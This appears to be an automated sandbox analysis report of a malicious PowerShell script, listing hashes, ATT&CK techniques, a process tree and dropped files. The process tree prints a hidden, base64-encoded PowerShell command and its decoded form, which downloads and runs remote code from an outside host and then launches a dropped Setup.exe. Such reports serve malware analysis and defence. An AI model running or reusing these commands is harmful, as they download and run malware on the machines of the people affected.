a6fd200fde1e73379fddf3dc7a8ce5dbafd3ab37d792f19df460aa698a79d33f

General

Target

newvideozones.click.ps1
Size

257B
MD5

3c5d748d2f9a6ab8fc7035bb452fcf94
SHA1

e74e4c76bc2003e9fc181872f18eef0ac0a8c86e
SHA256

a6fd200fde1e73379fddf3dc7a8ce5dbafd3ab37d792f19df460aa698a79d33f
SHA512

3322929c0284c4a2ab522aa083dfa133f36859c0f437f2fd1bfc2c01829abfa1d69e5ed485da73fbb9d44636d133f7986b398df805adbe7343e1f333a444ca15

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 5 IoCs

flow	pid	Process
2	1264	powershell.exe
3	1264	powershell.exe
6	1264	powershell.exe
7	1264	powershell.exe
8	1264	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4828	powershell.exe
1264	powershell.exe
2864	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
1860	Setup.exe

Program crash 1 IoCs

pid	pid_target	Process	procid_target
5056	1860	WerFault.exe	84

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Setup.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
4828	powershell.exe
4828	powershell.exe
2864	powershell.exe
2864	powershell.exe
1264	powershell.exe
1264	powershell.exe
1860	Setup.exe
1860	Setup.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	4828	powershell.exe
Token: SeDebugPrivilege	2864	powershell.exe
Token: SeDebugPrivilege	1264	powershell.exe

Suspicious use of WriteProcessMemory 7 IoCs

description	pid	Process	procid_target
PID 4828 wrote to memory of 2864	4828	powershell.exe	82
PID 4828 wrote to memory of 2864	4828	powershell.exe	82
PID 2864 wrote to memory of 1264	2864	powershell.exe	83
PID 2864 wrote to memory of 1264	2864	powershell.exe	83
PID 1264 wrote to memory of 1860	1264	powershell.exe	84
PID 1264 wrote to memory of 1860	1264	powershell.exe	84
PID 1264 wrote to memory of 1860	1264	powershell.exe	84

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\newvideozones.click.ps1
1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4828
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -W Hidden -eC cABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwAgAEgAaQBkAGQAZQBuACAALQBjACAAIgBpAGUAeAAgACgAaQB3AHIAIABoAHQAdABwAHMAOgAvAC8AaQBwAGwAbwBnAGcAZQByAC4AYwBvAC8AMgBoADMAcQBmADUAIAAtAFUAcwBlAEIAYQBzAGkAYwBQAGEAcgBzAGkAbgBnACkALgBDAG8AbgB0AGUAbgB0ACIA
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2864
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -W Hidden -c "iex (iwr https://iplogger.co/2h3qf5 -UseBasicParsing).Content"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1264
  - - C:\Users\Admin\AppData\Local\Temp\file\Setup.exe
      "C:\Users\Admin\AppData\Local\Temp\file\Setup.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:1860
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1860 -s 1604
        5⤵
        Program crash
        
        PID:5056

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1860 -ip 1860
1⤵
PID:5064

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
ae626d9a72417b14570daa8fcd5d34a4

SHA1
c103ebaf4d760df722d620df87e6f07c0486439f

SHA256
52cc3f3028fab0d347a4a3fffef570b42f85748176d81a3344996d42fd1de32a

SHA512
a0690bda318bdf43d6f292f88d4ea2ebeec83b95e9ebca80083dbb08e7ddcdb9735cc58b89d369a34f10acf8a114d4a207ed8d0f070c5baf87c5798e9f35bc14

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
5caad758326454b5788ec35315c4c304

SHA1
3aef8dba8042662a7fcf97e51047dc636b4d4724

SHA256
83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391

SHA512
4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
d8b9a260789a22d72263ef3bb119108c

SHA1
376a9bd48726f422679f2cd65003442c0b6f6dd5

SHA256
d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc

SHA512
550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_oobcfuq2.d2l.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/1264-38-0x00000232779E0000-0x00000232779EA000-memory.dmp

Filesize
40KB

Download
memory/1264-37-0x0000023277A00000-0x0000023277A12000-memory.dmp

Filesize
72KB

Download
memory/1860-113-0x0000000000400000-0x0000000002086000-memory.dmp

Filesize
28.5MB

Download
memory/1860-112-0x0000000002510000-0x0000000002511000-memory.dmp

Filesize
4KB

Download
memory/2864-21-0x00007FFF8EE30000-0x00007FFF8F8F2000-memory.dmp

Filesize
10.8MB

Download
memory/2864-24-0x00007FFF8EE30000-0x00007FFF8F8F2000-memory.dmp

Filesize
10.8MB

Download
memory/2864-23-0x00007FFF8EE30000-0x00007FFF8F8F2000-memory.dmp

Filesize
10.8MB

Download
memory/2864-34-0x00007FFF8EE30000-0x00007FFF8F8F2000-memory.dmp

Filesize
10.8MB

Download
memory/2864-22-0x00007FFF8EE30000-0x00007FFF8F8F2000-memory.dmp

Filesize
10.8MB

Download
memory/2864-108-0x00007FFF8EE30000-0x00007FFF8F8F2000-memory.dmp

Filesize
10.8MB

Download
memory/4828-12-0x00007FFF8EE30000-0x00007FFF8F8F2000-memory.dmp

Filesize
10.8MB

Download
memory/4828-33-0x00007FFF8EE30000-0x00007FFF8F8F2000-memory.dmp

Filesize
10.8MB

Download
memory/4828-0-0x00007FFF8EE33000-0x00007FFF8EE35000-memory.dmp

Filesize
8KB

Download
memory/4828-11-0x00007FFF8EE30000-0x00007FFF8F8F2000-memory.dmp

Filesize
10.8MB

Download
memory/4828-111-0x00007FFF8EE30000-0x00007FFF8F8F2000-memory.dmp

Filesize
10.8MB

Download
memory/4828-9-0x0000019F7FCC0000-0x0000019F7FCE2000-memory.dmp

Filesize
136KB

Download
memory/4828-10-0x00007FFF8EE30000-0x00007FFF8F8F2000-memory.dmp

Filesize
10.8MB

Download

Analysis

Sharing